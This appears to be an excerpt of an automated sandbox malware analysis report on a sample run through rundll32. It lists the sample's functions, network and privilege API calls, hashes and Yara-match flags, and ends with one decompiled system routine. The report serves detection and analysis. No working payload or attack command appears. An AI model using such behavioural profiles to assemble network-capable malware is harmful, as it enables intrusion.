                                                                                                • Instruction Fuzzy Hash: C501E8B2905119ABCB14DF98D8459EFBBBCEB58210F158199FD1CA7204D670AA108BE2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCEE9 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 40networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 492 29ccee9-29ccf29 493 29ccf32-29ccf39 492->493 494 29ccf2d call 29cd4c0 492->494 495 29ccf3b-29ccf55 HttpSendRequestA 493->495 496 29ccf56-29ccf5c 493->496 494->493
                                                                                                APIs
                                                                                                • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,?,?,?,?,?,?), ref: 029CCF4F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HttpRequestSend
                                                                                                • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                • API String ID: 360639707-2503632690
                                                                                                • Opcode ID: 9db205712e953228a9fe9ea6130e51395a7e6a50e1dfbee8ba6159a589bf7d4f
                                                                                                • Instruction ID: 83d855c37c6fd3b4b43e281c066fdbe84f4b60faa97975f8e6b221c55c0975aa
                                                                                                • Opcode Fuzzy Hash: 9db205712e953228a9fe9ea6130e51395a7e6a50e1dfbee8ba6159a589bf7d4f
                                                                                                • Instruction Fuzzy Hash: 3B014BB6915119AFCB14DF98D981AEF7BB8EB98310F118198FD1D6B304D630AA11CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCD80 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 550 29ccd80-29ccdc4 call 29cd4c0 553 29ccdc6-29ccde0 InternetOpenA 550->553 554 29ccde1-29ccde7 550->554
                                                                                                APIs
                                                                                                • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?,?,?,?,?), ref: 029CCDDA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InternetOpen
                                                                                                • String ID: A$Inte$InternetOpenA$InternetOpenA$Open$estA$rnetOpenA
                                                                                                • API String ID: 2038078732-3700100117
                                                                                                • Opcode ID: 359645abaf7c47f5632c39fe3bd9445b820070f9646d40cd3258546f8177b170
                                                                                                • Instruction ID: ac962ec7db77ba7a9bcaa60107f070ef2efdc19ef10aa3fd5e75c44def01b449
                                                                                                • Opcode Fuzzy Hash: 359645abaf7c47f5632c39fe3bd9445b820070f9646d40cd3258546f8177b170
                                                                                                • Instruction Fuzzy Hash: 7B0119B2A11219AF8B14DF98DC419FBB7BCEF48310B14859DBE1C97241D630AA10CBE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CB490 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: net.dll$wininet.dll
                                                                                                • API String ID: 3472027048-1269752229
                                                                                                • Opcode ID: 81a2f59969892d7fd3d34de74939a74ea5c92164a85e8aa95514e75b265011c8
                                                                                                • Instruction ID: 138d9e765196dc3ca8379fcff2d0746e3a9df5bdcc3ab7ab7e4f9aded330e892
                                                                                                • Opcode Fuzzy Hash: 81a2f59969892d7fd3d34de74939a74ea5c92164a85e8aa95514e75b265011c8
                                                                                                • Instruction Fuzzy Hash: 5B31AEB5600604ABD724DFA4DC81FABB7EDEF88704F24852EE69D5B284D670B540CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CB487 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: net.dll$wininet.dll
                                                                                                • API String ID: 3472027048-1269752229
                                                                                                • Opcode ID: def24b05e45ecc1229bf7644f2935ea088c20a4a490d3dc1dc8a01121ae18f0b
                                                                                                • Instruction ID: 593d74cb4ff22ad5747c36087a9a338088a4ff71412ac4b2aea982ba06615d6c
                                                                                                • Opcode Fuzzy Hash: def24b05e45ecc1229bf7644f2935ea088c20a4a490d3dc1dc8a01121ae18f0b
                                                                                                • Instruction Fuzzy Hash: 9F31C0B1A40605ABD714DFA4DD82FABF7ACEF88704F24812DE65D5B284D670A500CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BFCE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 029BFE03
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID: @
                                                                                                • API String ID: 3188754299-2766056989
                                                                                                • Opcode ID: c243c1e528f62dddaa50e808ba710b55796d139c1275897ff5b8164a2799e0cd
                                                                                                • Instruction ID: 815db874ebf309aeea48eea7ec762deeb0630253e759e06f8a5fc32ab4ae1983
                                                                                                • Opcode Fuzzy Hash: c243c1e528f62dddaa50e808ba710b55796d139c1275897ff5b8164a2799e0cd
                                                                                                • Instruction Fuzzy Hash: 957184B29002086BDB15DB64CCC5FEBB37DBF98304F14499DB51A97141EB70A7858F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029C5210 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 029C5227
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                • Opcode ID: 3ad8900d4712cad57f790da656a10ff68e08a71f4ac5b0c101027d79ea9ad121
                                                                                                • Instruction ID: 9c8570e887be6590b2f6b3ced53e913cab8802f02946d61b5bee46d609000661
                                                                                                • Opcode Fuzzy Hash: 3ad8900d4712cad57f790da656a10ff68e08a71f4ac5b0c101027d79ea9ad121
                                                                                                • Instruction Fuzzy Hash: E3314DB5A0020AAFDB00DFD8C8809EFB3B9BF88304B508559E506AB204D775FE058BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029C520B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 029C5227
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID: @J7<
                                                                                                • API String ID: 2538663250-2016760708
                                                                                                • Opcode ID: b5b1d1768c3cd0f4d43cd5cf896d6facde5f358df7d6a2529acb2eb2251e50ab
                                                                                                • Instruction ID: 70a3519a6c123b955612a61718ec1bcbf905119ca91a16a73768448839339386
                                                                                                • Opcode Fuzzy Hash: b5b1d1768c3cd0f4d43cd5cf896d6facde5f358df7d6a2529acb2eb2251e50ab
                                                                                                • Instruction Fuzzy Hash: F4314FB5A0060AAFDB00DFD8D8809EEB7B9BF88304B508559E506AB204D775EE05CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BB150 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 029BB1C2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: 68fe24ff8bce41d18426065ea2a0f6e50d3c61ef71737ede9921b03aa4814a43
                                                                                                • Instruction ID: e747c2c8761589d6643e51b39914aaa496a0617ae59aed12911b18c61db3c351
                                                                                                • Opcode Fuzzy Hash: 68fe24ff8bce41d18426065ea2a0f6e50d3c61ef71737ede9921b03aa4814a43
                                                                                                • Instruction Fuzzy Hash: 88011EB5E0020DABDB10EAA4DD51FDEB7799F54308F1041A9ED0997281F671E714CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CB5D0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,-00000002,E79163C8,00000000,00000000,029BDDD2,?,?,?,E79163C8,?), ref: 029CB612
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread
                                                                                                • String ID:
                                                                                                • API String ID: 2422867632-0
                                                                                                • Opcode ID: cba9f2f73c77e6966ec7e5e7209365540182555cd00e272f40b690f950e4a39d
                                                                                                • Instruction ID: 33adac8ceb6ad73118089dd5545e6f17284e9242d860869e2576da5d9471674e
                                                                                                • Opcode Fuzzy Hash: cba9f2f73c77e6966ec7e5e7209365540182555cd00e272f40b690f950e4a39d
                                                                                                • Instruction Fuzzy Hash: 46F06D733802143AE33061E9DC02FDBB68DDBC5B61F240029F60CEA1C0D992B8014AE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BE7C1 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(029C4202,?,?,029C4202,00000000,?), ref: 029BE7FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 0e2b4eb598f572800b86c1d2586f58344f1e1cb166f8508baf4e41154924d0dd
                                                                                                • Instruction ID: 5e13e355ee42b2808cc608e3b2e8670506ba5726edd60053aabe1953247274dd
                                                                                                • Opcode Fuzzy Hash: 0e2b4eb598f572800b86c1d2586f58344f1e1cb166f8508baf4e41154924d0dd
                                                                                                • Instruction Fuzzy Hash: 38E0617194050427FB1455649C85FD9371D4F4C718F784250F498CB2C3D139E5024580
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCA42 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,74511176,00000000,?), ref: 029CCA7D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: e101e2b0e17794165af806fa4ba8a603819330042afc6f1e91496579ff681e2e
                                                                                                • Instruction ID: ba52c5ecda21b99b6bb247b849ffd6227a63d1d9be3d4c7ad7903d29bf224388
                                                                                                • Opcode Fuzzy Hash: e101e2b0e17794165af806fa4ba8a603819330042afc6f1e91496579ff681e2e
                                                                                                • Instruction Fuzzy Hash: E1E065B66101106FCB24DF95DD88ED73759EF84324F014654BD1D9B2C1C530E801CAB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCBA6 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,029BE122,029BE122,?,00000000,?,?), ref: 029CCBE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LookupPrivilegeValue
                                                                                                • String ID:
                                                                                                • API String ID: 3899507212-0
                                                                                                • Opcode ID: 52a877902f1f6234b2bb092feb5a608eae1f28d3aa2cbc2769fdc382232bf596
                                                                                                • Instruction ID: 08e2b709e922aca536417f5250190be518db1effa14deb55e2374ceac5ffd238
                                                                                                • Opcode Fuzzy Hash: 52a877902f1f6234b2bb092feb5a608eae1f28d3aa2cbc2769fdc382232bf596
                                                                                                • Instruction Fuzzy Hash: 9FE06DB5601244BBD710EFA8CC80EEB3BA9DF89254F1145A8FA0997382D535E8158BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BE7D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNEL32(029C4202,?,?,029C4202,00000000,?), ref: 029BE7FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: e9c9783f786ef8d5330116f7cc0f18e2ed59dd6e39d5ecdd79aeefa4644272af
                                                                                                • Instruction ID: 4a79dc7bffc0c69fe149bbdd206452316ff4dd3d43361b8e66c0c299081ffecd
                                                                                                • Opcode Fuzzy Hash: e9c9783f786ef8d5330116f7cc0f18e2ed59dd6e39d5ecdd79aeefa4644272af
                                                                                                • Instruction Fuzzy Hash: 4DE0867164060827FF246AA89D49FE6335C8F8CB28F584661F95CDB2C3D678F9418554
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCA10 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(029C6E76,?,029C761D,029C761D,?,029C6E76,00000000,?,?,?,?,00000000,00000000,00000002), ref: 029CCA3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                • Instruction ID: 1a33c822fa9bc6334fa78b6b181f670b3969d312073669cad3c91c97465d693f
                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                • Instruction Fuzzy Hash: 87E012B2200208ABCB14EF89DC44EAB37ADAF88664F118058BA095B281C630F9108AF1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCA50 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,74511176,00000000,?), ref: 029CCA7D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3298025750-0
                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                • Instruction ID: e4a4c10d560366d855d4ba02bce4afd5cdfa09a5e19624d714f661f7a360c50d
                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                • Instruction Fuzzy Hash: 8EE012B1200208ABCB14EF89DC48EAB37ADAF89750F118058BA095B281C630E910CAF2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CCBB0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,029BE122,029BE122,?,00000000,?,?), ref: 029CCBE0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LookupPrivilegeValue
                                                                                                • String ID:
                                                                                                • API String ID: 3899507212-0
                                                                                                • Opcode ID: 4e26b51885fde93309f56aebe0523e6fe8fd084813fce991475a3464cf4cca46
                                                                                                • Instruction ID: 87a05375c06fd220cc7e2a486ae9572dfa6a7ee287d29bb29d1a7ad34a1efdda
                                                                                                • Opcode Fuzzy Hash: 4e26b51885fde93309f56aebe0523e6fe8fd084813fce991475a3464cf4cca46
                                                                                                • Instruction Fuzzy Hash: F2E01AB16002046BD710DF49CC44EE737ADAF89654F114064BA0957282C634E8108AF5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BE5C7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,029B8D8A,?), ref: 029BE601
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 707d7b67629b65f4e75552862ca75962f27dc44363b5609e04d55695aa05e077
                                                                                                • Instruction ID: d244a2908308ee1be18ce316d8d3ea9943cdc2716f236b4d61aa18e7a342c33c
                                                                                                • Opcode Fuzzy Hash: 707d7b67629b65f4e75552862ca75962f27dc44363b5609e04d55695aa05e077
                                                                                                • Instruction Fuzzy Hash: 11E0C2B7B842052BF721E6F09C07FDA268D5F88664F094158B84CFB2C3E650E5018A69
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029BE5D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00008003,?,?,029B8D8A,?), ref: 029BE601
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 98cdfff42476da5714e1407d8394bc75350a8aa6493b4f355c9832ba171c6190
                                                                                                • Instruction ID: ced5cfcea4583d958ba07e81d5542e21041ded3185605e828f143b4c94ba7a6f
                                                                                                • Opcode Fuzzy Hash: 98cdfff42476da5714e1407d8394bc75350a8aa6493b4f355c9832ba171c6190
                                                                                                • Instruction Fuzzy Hash: AED0A7717803083BF610E6F5DC46F96328D5F48B55F044064F94CEB2C3D951F50049A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 029CC9D6 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(029C6E76,?,029C761D,029C761D,?,029C6E76,00000000,?,?,?,?,00000000,00000000,00000002), ref: 029CCA3D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 7c8f07823e30d1ecc4c8964f1cf9797b130f3fce64deba06aac9fcd7d9b0044f
                                                                                                • Instruction ID: 912bf209911d64659a9708224354f1a4c42540ba936e0d9ac61a7a8da4446b27
                                                                                                • Opcode Fuzzy Hash: 7c8f07823e30d1ecc4c8964f1cf9797b130f3fce64deba06aac9fcd7d9b0044f
                                                                                                • Instruction Fuzzy Hash: C8B014715541715DC7315FD15C555553714DD4535471105DFD40D4F405C731D051C751
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0442967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_43c0000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 243d4dc7d602414ac7607af1db80a7a7eb6a5fd0aed1dae7789dfd1853dbc9a1
                                                                                                • Instruction ID: c4382ba01230e2da4a84d00ade310c32c8cb634a45daa42749b91162aca36eb1
                                                                                                • Opcode Fuzzy Hash: 243d4dc7d602414ac7607af1db80a7a7eb6a5fd0aed1dae7789dfd1853dbc9a1
                                                                                                • Instruction Fuzzy Hash: F2B09BF1D014D5C9FF11D7604708717794077D4B46F56C063D1020651A477CD195F5B5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 029B4DBF Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830264060.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_7_2_29b0000_rundll32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 690bce7fd6b574d2ac79a4c3af1f08f2182b8abc52045a4243d5b2f3f60cb3fe
                                                                                                • Instruction ID: de3964990c87b2a68b2ea691ed706a977c4edd5188236a6386ef68a77ed26636
                                                                                                • Opcode Fuzzy Hash: 690bce7fd6b574d2ac79a4c3af1f08f2182b8abc52045a4243d5b2f3f60cb3fe
                                                                                                • Instruction Fuzzy Hash: 5BB09253E092890686130A593C020B8FB20D493022B4A23E3CA48A7012A0028825429D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0447FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 53%
                                                                                                			E0447FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0442CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04475720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04475720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                0x0447fdda
                                                                                                0x0447fde2
                                                                                                0x0447fde5
                                                                                                0x0447fdec
                                                                                                0x0447fdfa
                                                                                                0x0447fdff
                                                                                                0x0447fe0a
                                                                                                0x0447fe0f
                                                                                                0x0447fe17
                                                                                                0x0447fe1e
                                                                                                0x0447fe19
                                                                                                0x0447fe19
                                                                                                0x0447fe19
                                                                                                0x0447fe20
                                                                                                0x0447fe21
                                                                                                0x0447fe22
                                                                                                0x0447fe25
                                                                                                0x0447fe40

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0447FDFA
                                                                                                Strings
                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0447FE01
                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0447FE2B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000007.00000002.830633565.00000000043C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 043C0000, based on PE: true
                                                                                                • Associated: 00000007.00000002.831518181.00000000044DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000007.00000002.831539102.00000000044DF000.00000040.00000800.00020000.00000000.sdmpDownload File
